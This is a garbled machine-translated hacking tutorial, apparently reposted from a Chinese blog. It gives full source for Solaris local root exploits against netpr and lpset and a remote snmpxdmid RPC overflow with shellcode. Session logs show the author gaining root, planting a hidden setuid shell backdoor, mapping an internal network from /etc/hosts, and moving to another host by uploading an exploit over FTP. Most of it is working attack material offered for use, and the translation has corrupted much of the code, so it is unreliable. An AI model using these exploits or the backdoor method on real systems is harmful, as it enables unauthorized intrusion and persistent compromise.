UNIX intrusion process (2)

xiaoxiao2021-03-06  89

UNIX intrusion process (2)

/ * ## CopyRight Last Stage Of Delirium Dec 1999 Poland *: //lsd-pl.net/ # * / / * ## / usr / lib / lp / bin / netpr # * / / * Requires to Specify The Address of A host with 515 port opened * / #define NOPNUM 4000 #define adrnum 1200 #define allign 3 char shellcode [] = "/ x20 / xbf / xff / xff" / * BN, A

* /

"/ X20 / XBF / XFF / XFF" / * BN, A

* /

"/ X7F / XFF / XFF / XFF" / * CALL

* /

"/ x90 / x03 / xe0 / x20" / * add% o7, 32,% o0 * /

"/ x92 / x02 / x20 / x10" / * add% o0, 16,% o1 * /

"/ XC0 / X22 / X20 / X08" / * ST% G0, [% O0 8] * /

"/ xd0 / x22 / x20 / x10" / * ST% O0, [% O0 16] * /

"/ XC0 / X22 / X20 / X14" / * ST% G0, [% O0 20] * /

"/ x82 / x10 / x20 / x0b" / * mov 0xb,% g1 * /

"/ x91 / xd0 / x20 / x08" / * ta 8 * /

"/ bin / ksh"

;

Char jump [] =

"/ x81 / xc3 / xe0 / x08" / * jmp% O7 8 * /

"/ x90 / x10 / x00 / x0e" / * MOV% SP,% o0 * /

;

Static char NOP [] = "/ x80 / ​​x1c / x40 / x11";

Main (int Argc, char ** argv) {

Char Buffer [10000], ADR [4], * B, * ENVP [2];

INT I;

Printf ("Copyright Last Stage Of Delirium Dec 1999 Poland //LSD-PL.NET//N");

Printf ("/ usr / lib / lp / bin / netpr solaris 2.7 sparc / n / n");

IF (argc == 1) {

Printf ("USAGE:% S lpserver / n", argv [0]);

EXIT (-1);

}

* (UNSIGNED Long *) ADR) = (* (unsigned long (*) ()) jump) () 7124 2000;

Envp [0] = & buffer [0];

ENVP [1] = 0;

B = & buffer [0];

Sprintf (b, "xxx =");

B = 4;

For (i = 0; i <1 4 - (Strlen (Argv [1])% 4); i ) * b = 0xFF; for (i = 0; i

For (i = 0; i

* b = 0;

B = & buffer [5000];

For (i = 0; i

For (i = 0; i

* b = 0;

Execle ("/ USR / LIB / LP / BIN / NETPR", "LSD", "- I", "BZZ-Z", "- U", "X! X", "- D", Argv [1] ,

"-p", & buffer [5000], "/ bin / sh", 0, eNVP);

}

^ D (*** Here is the end of the Ctrl D, you can use VI to write, FTP, RCP and other uploads can also be. ***)

(*** source program at http://lsd-pl.net/files/get?solaris/solsparc_netpr ***)

$ Ls -al / tmp (*** View Test.c is built ***)

Total 1330

DRWXRWXRWT 7 Sys Sys 1049 JUL 4 19:07.

Drwxrwxrwx 35 root root 1024 jun 29 16:52..

DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-PIPE

DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-unix

DRWXRWXRWX 2 root root 179 May 4 14:39 .pcmcia

Drwxrwxrwx 2 root other 181 JUN 20 13:18.removable

Drwxrwxrwt 2 root root 327 May 4 14:39.rpc_door

-rwxrwxr-x 1 root other 614 May 8 11:17 enctest.class

-rw ------- 1 root other 265936 May 4 14:40 DTDBCACHE_: 0

-rw ------- 1 Render9 Render 0 May 8 11:42 Mpcraohb

-rw ------- 1 Render9 Render 0 May 8 13:02 Mptwagyf

-rw-rw-r - 1 root sys 5248 May 4 14:39 PS_DATA

-rw-rw-r - 1 root other 0 jun 20 13:18 sdtvolcheck399

-rw-r - r - 1 root Other 4 May 4 14:39 SpecKeysd.lock

-rw-rw-r - 1 delex staff 2019 JUL 4 19:10 Test.c

-rw-rw-r - 1 root sys 326236 May 7 11:30 UPS_DATA

$ GCC -O Test Test.c (*** is generally compiled with this way, more information, please see the help ***)

$ ./Test

Copyright last stage of delirium dec 1999 poland //lsd-pl.net/

/ usr / lib / lp / bin / netpr Solaris 2.7 sparcusage: ./test lpserver

$ ./Test localhost

Copyright last stage of delirium dec 1999 poland //lsd-pl.net/

/ usr / lib / lp / bin / netpr Solaris 2.7 SPARC

# Id

UID = 1035 (Delex) GID = 20 (STAFF) EUID = 0 (ROOT) (*** successfully obtained root ***)

# MKDIR / USR / LIB / ...

# Cp / bin / ksh /usr/lib/... / (*** is a simple back door ***)

# Chmod S /USR/LIB/...

# Cat / etc / hosts (*** Take a look at how big this network ***)

########################################################################################################################################################################################################################################################################################################

## GIPS LIMITED Server Hosts Names

## 2001-03-01 (Develop)

########################################################################################################################################################################################################################################################################################################

127.0.0.1 Localhost Loghost

########################################################################################################################################################################################################################################################################################################

## Gipex (Internal - Citic Back-End)

192.168.2.1 Office-i2 Gate-Citic-Backend

192.168.2.5 Render1 Render1-I1

########################################################################################################################################################################################################################################################################################################

## GIPEX (Internal - Citic Office)

192.168.1.11 Office-i1 Gate-Citic-Office

########################################################################################################################################################################################################################################################################################################

## GIPEX (Internal - Ilink)

192.168.100.1 Backup-I1 Gate-ILINK-VPN

## .2 - .9

192.168.100.10 WWW1-I1

192.168.100.11 DB1 DB1-I1 WWW0-I1 www0 www0.xxwex.com

192.168.100.12 SNAP1

## .13

192.168.100.14 SNAP2

192.168.100.15 SNAP3

192.168.100.16 WWW2-I1 MAIL-I1

192.168.100.17 WWW2-I2 MAIL-I2

192.168.100.18 Render2 Render2-I1

192.168.100.19 Render2-I2

## .20 - .252

192.168.100.253 Switch1

## .254

# / Usr / sbin / ping 192.168.100.253

ICMP Host Unreachable from Gateway Wc-sf1.kage.NET (210.76.87.2)

For ICMP from develop (192.168. 0.2) to WWW1-I1 (192.168.100.253)

ICMP Host Unreachable from Gateway Wc-sf1.kage.NET (210.76.87.2)

For ICMP from develop (192.168.0.2) to WWW1-I1 (192.168.100.253)

ICMP host unreachable from getway wc-sf1.kage.net (210.76.87.2) for ICMP from development (192.168.0.2) to WWW1-I1 (192.168.100.253)

^ C (*** LAN is connected ***)

#

------------------------------------------------ Test -------------------------------------------------- ----------------

I will slowly get my internal Internet.

Now go back to take this SunOS 5.6.

------------------------------------------------ Test -------------------------------------------------- ----------------

# Cat> lpset.c (*** source program at http://lsd-pl.net/files/get?solaris/solsparc_lpset ***)

/ * ## Copyright Last Stage of Delirium Apr 2000 Poland *: //lsd-pl.net/ # * /

/ * ## / usr / bin / lpset # * /

#define nopnum 864

#define adrnum 132

#define allign 3

Char shellcode [] =

"/ X20 / XBF / XFF / XFF" / * BN, A

* /

"/ X20 / XBF / XFF / XFF" / * BN, A

* /

"/ X7F / XFF / XFF / XFF" / * CALL

* /

"/ x90 / x03 / xe0 / x20" / * add% o7, 32,% o0 * /

"/ x92 / x02 / x20 / x10" / * add% o0, 16,% o1 * /

"/ XC0 / X22 / X20 / X08" / * ST% G0, [% O0 8] * /

"/ xd0 / x22 / x20 / x10" / * ST% O0, [% O0 16] * /

"/ XC0 / X22 / X20 / X14" / * ST% G0, [% O0 20] * /

"/ x82 / x10 / x20 / x0b" / * mov 0xb,% g1 * /

"/ x91 / xd0 / x20 / x08" / * ta 8 * /

"/ bin / ksh"

;

Char jump [] =

"/ x81 / xc3 / xe0 / x08" / * jmp% O7 8 * /

"/ x90 / x10 / x00 / x0e" / * MOV% SP,% o0 * /

;

Static char NOP [] = "/ x80 / ​​x1c / x40 / x11";

Main (int Argc, char ** argv) {

Char buffer [10000], ADR [4], * B;

INT I;

Printf ("Copyright Last Stage of Delirium Apr 2000 Poland //LSD-PL.NET//n" :printf ("/r/bin/lpset for Solaris 2.6 2.7 SPARC / N / N ");

* (UNSIGNED Long *) ADR) = (* (unsigned long (*) ()) jump) () 10088 400;

B = buffer;

Sprintf (b, "xxx =");

B = 4;

For (i = 0; i <2; i ) * b = 0xFF;

For (i = 0; i

For (i = 0; i

For (i = 0; i

For (i = 0; i

* b = 0;

Execle ("/ USR / BIN / LPSET", "LSD", "- N", "XFN", "- A", Buffer, "Printer", 0, 0);

}

^ D

# Gcc -o lpset lpset.c

/ bin / ksh: GCC: Not found

# Exit

$ Gcc -o lpset lpset.c

$ Ls -al

Total 1410

DRWXRWXRWT 7 SYS SYS 1236 JUL 4 20:33.

Drwxrwxrwx 35 root root 1024 jul 4 19:15 ..

DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-PIPE

DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-unix

DRWXRWXRWX 2 root root 179 May 4 14:39 .pcmcia

Drwxrwxrwx 2 root other 181 JUN 20 13:18.removable

Drwxrwxrwt 2 root root 327 May 4 14:39.rpc_door

-rwxrwxr-x 1 root other 614 May 8 11:17 enctest.class

-rw ------- 1 root other 265936 May 4 14:40 DTDBCACHE_: 0

-rwxrwxr-x 1 delex staff 8572 JUL 4 20:33 lpset

-rw-rw-r - 1 delex staff 1685 JUL 4 20:32 lpset.c

-rw ------- 1 Render9 Render 0 May 8 11:42 Mpcraohb

-rw ------- 1 Render9 Render 0 May 8 13:02 Mptwagyf

-rw-rw-r - 1 root sys 5248 May 4 14:39 PS_DATA

-rw-rw-r - 1 root other 0 jun 20 13:18 sdtvolcheck399

-rw-r - r - 1 root Other 4 May 4 14:39 SpecKeysd.lock

-rwxrwxr-x 1 delex staff 8916 Jul 4 19:13 Test

-rw-rw-r - 1 delex staff 2019 JUL 4 19:10 Test.c-rw-rw-r - 1 root sys 326236 May 7 11:30 UPS_DATA

$ Ftp 192.168.0.3

Connected to 192.168.0.3.

220 dev01 FTP Server (SunOS 5.6) Ready.

Name (192.168.0.2:delex): Tong

331 Password Required for tong.

PASSWORD:

230 User tong logged in.

FTP> CD / TMP

250 CWD Command Successful.

FTP> bin (*** Set up the upload mode is binary ***)

200 Type Set to I.

FTP> PUT LPSET

200 Port Command Successful.

150 Binary Data Connection for LPSET (192.168.0.2, 49105).

226 Transfer Complete.

Local: lpset Remote: lpset

8572 BYTES SENT IN 0.00054 Seconds (15617.71 kbytes / s)

FTP> by

221 Goodbye.

$ Telnet 192.168.0.3

Trying 192.168.0.3 ...

Connected to 192.168.0.3.

Escape Character is '^]'.

Sunos 5.6

Login: Tong

PASSWORD:

Last Login: Wed Jul 4 20:31:37 from 192.168.0.2

Sun Microsystems Inc. Sunos 5.6 Generic August 1997

You have mail.

$ / TMP / LPSET

/ TMP / LPSET: Cannot EXECUTE

$ CHMOD 755 / TMP / LPSET

$ / TMP / LPSET

Copyright last stage of delirium apr 2000 poland //lsd-pl.net/

/ usr / bin / lpset for Solaris 2.6 2.7 SPARC

# Id

UID = 107 (tong) GID = 10 (STAFF) EUID = 0 (*** Hoho ~ Didn't die? ***)

#mkdir / usr / lib / ...

#CP / bin / ksh /usr/lib/...

#CHMOD S /USR/LIB/...

#exit

$ EXIT

Connection Closed by Foreign Host. (*** No, footprint does not rub ***)

$ EXIT

Lost connection to the host.

C: />

------------------------------------------------ Test -------------------------------------------------- ----------------

Oh, why not do it? Disconnected? Don't even rub the footprint?

Hey, brothers, now 21:00, but also to take the subway. Originally 20:30, you will go, continue tomorrow, can't manage so much. Let's go back to see me before.

The tutorial, how to rub the PP. In order to save the layout, this tutorial will not show PP, you have to know how to wipe it. :) Right, learn from the use of remote overflow tomorrow, then find a few redhat back.

Go back, your stomach is also hungry, see you tomorrow ~~

ZZZZZZZZZ ~~~~~~~~

the next day:

Hey, everyone is good morning ~

I am going to work today, I have to be assigned, I will ask.

Shot ...

True, assigned tasks.

However, it started from next week. :)

So I will write the tutorial today.

I don't know if I can write this tutorial today.

We continue. :)

Yesterday, the method of local upgrading permissions, today we will talk about remote overflow.

Almost various operating systems have a serious remote overflow vulnerability.

Commonly known:

RPC.TTDBServerd from Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6

RPC.cmsd from Solaris 2.5, 2.5.1, 2.6, 7

SADMIND of Solaris 2.6, 7

SNMPXDMID of Solaris 7, 8

RedHat 6.0, 5.1, 4.0 AMD

RPC.Statd of Redhat 6.2, 6.1, 6.0

Redhat 7.0 LPRNG

...

Other systems are not listed.

In addition to the problem of the system itself, there are some third-party programs have problems.

For example, common FTP server Wu-ftp, version 2.6.0 and below are serious remote overflow issues

For example, DNS Server Bind, Version 8.2.2 and the following versions have a serious remote overflow problem.

...

It is too much to take advantage of it, and you need to take time, you need to rely on experience.

After the experience is rich, invade a simple system, just get the other party's system version, then scan the port is enough. Because you have already

The weaknesses of the system and daemon have been well understood.

We tried to enter a machine of Solaris 8 this time.

------------------------------------------------ Test -------------------------------------------------- ----------------

C: /> Telnet 192.168.0.2

Sunos 5.7

Login: Login: Delex

PASSWORD:

*********************************************************** *******

# The jrun is now replaced by jserv

# To restart the servlet server, please use

Rs.sh

# However, As The Jserv Will Reload Those Classes

# INSIDE The "/ usr / proj / gipex / class", you JUST

#Need to remove the old class with the new one.

*********************************************************** *******

$ W

9:21 AM UP 61 Day (s), 18:42, 2 Uses, Load Average: 0.03, 0.04, 0.05

User tty login @ iDLE JCPU PCPUWHAT

Root console 4MAY0162DAYS 2 2 / USR / DT / BIN / SDT_SHELL-C? u

Root PTS / 4 FRI 4PM 6DAYS TAIL -F SYSLOG

Delex PTS / 6 9:21 AM W

$ ls -al / usr / lib / ...

Total 202

DRWXRWXR-X 2 Root Staff 512 JUL 5 10:22.

Drwxrwxr-x 46 root bin 10240 Jul 4 19:21 ..

-R-SR-SR-X 1 Root Staff 91668 JUL 5 10:22 .x

$ ID

UID = 1035 (delex) GID = 20 (STAFF)

$ /Usr/lib/...x (*** running the local back door left yesterday, get root permissions ***)

# Id

UID = 1035 (Delex) GID = 20 (STAFF) EUID = 0 (root)

# CD / TMP

# Ls -al (*** Yesterday's procedure forgot to delete, walk too hast, don't know if it is not there ***)

Total 1410

DRWXRWXRWT 7 SYS SYS 1236 JUL 5 10:20.

Drwxrwxrwx 35 root root 1024 jul 4 19:15 ..

DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-Pipe

DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-unix

DRWXRWXRWX 2 root root 179 May 4 14:39 .pcmcia

Drwxrwxrwx 2 root other 181 JUN 20 13:18.removable

Drwxrwxrwt 2 root root 327 May 4 14:39.rpc_door

-rwxrwxr-x 1 root other 614 May 8 11:17 enctest.class

-rw ------- 1 root other 265936 May 4 14:40 DTDBCACHE_: 0

-rwxrwxr-x 1 delex staff 8572 JUL 4 20:33 lpset (*** hoho ~ **)

-rw-rw-r - 1 delex staff 1685 JUL 4 20:32 lpset.c

-rw ------- 1 Render9 Render 0 May 8 11:42 Mpcraohb

-rw ------- 1 Render9 Render 0 May 8 13:02 Mptwagyf

-rw-rw-r - 1 root sys 5248 May 4 14:39 PS_DATA

-rw-rw-r - 1 root other 0 jun 20 13:18 sdtvolcheck399

-rw-r - r - 1 root Other 4 May 4 14:39 SpecKeysd.lock

-rwxrwxr-x 1 delex staff 8916 Jul 4 19:13 Test

-rw-rw-r - 1 delex staff 2019 JUL 4 19:10 Test.c

-rw-rw-r - 1 root sys 326236 May 7 11:30 UPS_DATA

# Cat> snmp.c (*** source program at http://lsd-pl.net/files/get?solaris/solsparc_snmpxdmid ***)

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define snmpxdmid_prog 100249

#define snmpxdmid_vers 0x1

#define snmpxdmid_addcomponent 0x101

Char findsckcode [] =

"/ X20 / XBF / XFF / XFF" / * BN, A

* /

"/ X20 / XBF / XFF / XFF" / * BN, A

* /

"/ X7F / XFF / XFF / XFF" / * CALL

* /

"/ x33 / x02 / x12 / x34"

"/ Xa0 / X10 / X20 / XFF" / * MOV 0xFF,% l0 * /

"/ xa2 / x10 / x20 / x54" / * mov 0x54,% l1 * /

"/ XA4 / X03 / XFF / XD0" / * Add% O7, -48,% L2 * /

"/ XAA / X03 / XE0 / X28" / * add% O7, 40,% L5 * /

"/ x81 / xc5 / x60 / x08" / * jmp% L5 8 * /

"/ XC0 / X2B / XE0 / X04" / * STB% G0, [% O7 4] * /

"/ XE6 / X03 / XFF / XD0" / * LD [% O7-48],% L3 * /

"/ XE8 / X03 / XE0 / X04" / * LD [% O7 4],% L4 * /

"/ xa8 / xa4 / xc0 / x14" / * SUBCC% L3,% L4,% L4 * /

"/ X02 / XBF / XFF / XFB" / * BZ

* /

"/ XAA / X03 / XE0 / X5C" / * Add% O7, 92,% L5 * /

"/ XE2 / X23 / XFF / XC4" / * ST% L1, [% O7-60] * /

"/ XE2 / X23 / XFF / XC8" / * ST% L1, [% O7-56] * /

"/ Xe4 / X23 / XFF / XCC" / * ST% L2, [% O7-52] * /

"/ x90 / x04 / x20 / x01" / * add% L0, 1,% o0 * /

"/ Xa7 / X2C / X60 / X08" / * SLL% L1, 8,% L3 * /

"/ x92 / x14 / xe0 / x91" / * OR% L3, 0x91,% O1 * /

"/ x94 / x03 / xff / xc4" / * add% O7, -60,% o2 * / "/ x82 / x10 / x20 / x36" / * MOV 0x36,% G1 * /

"/ x91 / xd0 / x20 / x08" / * ta 8 * /

"/ x1a / xbf / xff / xf1" / * BCC

* /

"/ xa0 / xa4 / x20 / x01" / * Deccc% l0 * /

"/ x12 / xbf / xff / xf5" / * BNE

* /

"/ Xa6 / x10 / x20 / x03" / * MOV 0x03,% L3 * /

"/ x90 / x04 / x20 / x02" / * add% l0, 2,% o0 * /

"/ x92 / x10 / x20 / x09" / * MOV 0x09,% o1 * /

"/ X94 / X04 / XFF / XFF" / * Add% L3, -1,% O2 * /

"/ x82 / x10 / x20 / x3e" / * MOV 0x3e,% g1 * /

"/ Xa6 / X84 / XFF / XFF" / * AddCC% L3, -1,% L3 * /

"/ x12 / xbf / xff / xfb" / * BNE

* /

"/ x91 / xd0 / x20 / x08" / * ta 8 * /

;

Char shellcode [] =

"/ X20 / XBF / XFF / XFF" / * BN, A

* /

"/ X20 / XBF / XFF / XFF" / * BN, A

* /

"/ X7F / XFF / XFF / XFF" / * CALL

* /

"/ x90 / x03 / xe0 / x20" / * add% o7, 32,% o0 * /

"/ x92 / x02 / x20 / x10" / * add% o0, 16,% o1 * /

"/ XC0 / X22 / X20 / X08" / * ST% G0, [% O0 8] * /

"/ xd0 / x22 / x20 / x10" / * s "/ xc0 / x22 / x20 / x14" / * ST% G0, [% O0 20] * /

"/ x82 / x10 / x20 / x0b" / * MOV 0x0b,% g1 * /

"/ x91 / xd0 / x20 / x08" / * ta 8 * /

"/ bin / ksh"

;

Static char NOP [] = "/ x80 / ​​x1c / x40 / x11";

Typedef struct {

Struct {UNSIGNED INT LEN; Char * Val;} Name

Struct {unsigned int Len; char * val;} pragma

} REQ_T;

BOOL_T XDR_REQ (XDR * XDRS, Req_t * Objp) {

Char * v = null; unsigned long L = 0; int b = 1; if (! xdr_u_long (xdrs, & l)) Return (false);

IF (! xdr_pointer (xdrs, & v, 0, (xdrproc_t) null) Return (false);

IF (! XDR_BOOL (XDRS, & B)) Return (False);

IF (! XDR_U_LONG (XDRS, & L)) Return (false);

IF (! XDR_BOOL (XDRS, & B)) Return (False);

IF (! xdr_array (xdr_Array (xDRS, & objP-> name.val, & objp-> name.len, ~ 0, sizeof (char),

(xDrProc_t) xdr_char)) Return (false);

IF (! XDR_BOOL (XDRS, & B)) Return (False);

IF (! xdr_array (xdr_Array (xdrs, & objp-> pragma.val, & objp-> pragma.len, ~ 0, sizeof (char),

(xDrProc_t) xdr_char)) Return (false);

IF (! xdr_pointer (xdrs, & v, 0, (xdrproc_t) null) Return (false);

IF (! XDR_U_LONG (XDRS, & L)) Return (false);

Return (TRUE);

}

Main (int Argc, char ** argv) {

Char Buffer [140000], Address [4], PCH [4], * B;

INT I, C, N, VERS = -1, port = 0, SCK;

Client * Cl; Enum CLNT_STAT STAT;

Struct hostent * hp;

Struct SockAddr_in ADR;

Struct TimeValTM = {10,0};

REQ_T REQ;

Printf ("Copyright Last Stage of Delirium Mar 2001 Poland //LSD-PL.NET//N");

Printf ("SNMPXDMID for Solaris 2.7 2.8 SPARC / N / N");

IF (argc <2) {

Printf ("USAGE:% s address [-P port] -V 7 | 8 / n", argv [0]);

EXIT (-1);

}

While ((c = getopt (argc-1, & argv [1], "p:"))! = - 1) {

Switch (c) {

Case 'P': port = atoi (OPTARG); Break;

Case 'V': VERS = ATOI (OPTARG);

}

}

Switch (VERS) {

Case 7: * (unsigned int *) address = 0x000b1868;

Case 8: * (unsigned int *) address = 0x000cf2c0; break;

DEFAULT: EXIT (-1);

}

* (unsigned long *) PCH = HTONL (* (unsigned int *) Address 32000);

* (unsigned long *) address = htonl (* (unsigned int *) Address 64000 32000);

Printf ("ADR = 0x% 08X Timeout =% D", NTOHL (* (unsigned long *) address, tm.tv_sec);

Fflush (stdout); adr.sin_family = af_INet;

ADR.sin_port = HTONS (port);

IF ((adr.sin_addr.s_addr = inet_addr (argv [1])) == - 1) {

IF ((hp = gethostByname) == null) {

Errno = EADDRNOTAVAIL; PERROR ("error"); exit (-1);

}

Memcpy (& adj to_addr.s_addr, hp-> h_addr, 4);

}

SCK = RPC_Anysock;

IF (! (CL = CLNTTCP_CREATE (& ADR, SNMPXDMID_PROG, SNMPXDMID_VERS, & SCK, 0, 0))) {

CLNT_PCREATEERROR ("Error"); exit (-1);

}

Cl-> cl_auth = authunix_create ("localhost", 0, 0, 0, null);

i = sizeof (struct sockaddr_in);

IF (GetSockName (STRUCT SOCKADDR *) & ADR, & I) == - 1) {

Struct {UNSIGNED INT MAXLEN; UNSIGNED INT LEN; CHAR * BUF;} NB;

IOCTL (SCK, (('s' << 8) | 2), "sockmod");

Nb.maxlen = 0xfffff;

nb.len = sizeof (struct sockaddr_in) ;;

Nb.buf = (char *) & ADR;

IOCTL (SCK, (('T' << 8) | 144), & nb);

}

n = ntoHS (adr.sin_port);

Printf ("Port =% D Connected!", N); FFLUSH (stdout);

FINDSCKCODE [12 2] = (Unsigned Char) ((N & 0xFF00) >> 8);

FINDSCKCODE [12 3] = (unsigned char) (N & 0xFF);

B = & buffer [0];

For (i = 0; i <1248; i ) * b = pch [i% 4];

For (i = 0; i <352; i ) * b = address [i% 4];

* b = 0;

B = & buffer [10000];

For (i = 0; i <64000; i ) * b = 0;

For (i = 0; i <64000-188; i ) * b = NOP [I% 4];

For (i = 0; i

For (i = 0; i

* b = 0;

Req.name.len = 1200 400 4;

Req.name.val = & buffer [0];

Req.pragma.len = 128000 4;

Req.pragma.val = & buffer [10000];

Stat = CLNT_CALL (Cl, SNMPXDMID_ADDComponent, XDR_Req, & Req, XDR_VOID, NULL, TM);

IF (stat == rpc_success) {Printf ("/ Nerror: not vulnerable / n"); exit (-1);} printf ("Sent! / N");

Write (SCK, "/ bin / uname -a / n", 14);

While (1) {

FD_SET FDS;

FD_ZERO (& FDS);

FD_SET (0, & fds);

FD_SET (SCK, & FDS);

IF (SELECT (FD_SETSIZE, & FDS, NULL, NULL, NULL) {

int CNT;

Char BUF [1024];

IF (fd_isset (0, & fds)) {

IF ((CNT = Read (0, BUF, 1024)) <1) {

IF (errno == ewouldblock || errno == eagain) Continue;

Else Break;

}

Write (SCK, BUF, CNT);

}

IF (fd_isset (SCK, & FDS)) {

IF ((CNT = Read (SCK, BUF, 1024) <1) {

IF (errno == ewouldblock || errno == eagain) Continue;

Else Break;

}

Write (1, BUF, CNT);

}

}

}

}

^ D

转载请注明原文地址:https://www.9cbs.com/read-122286.html

New Post(0)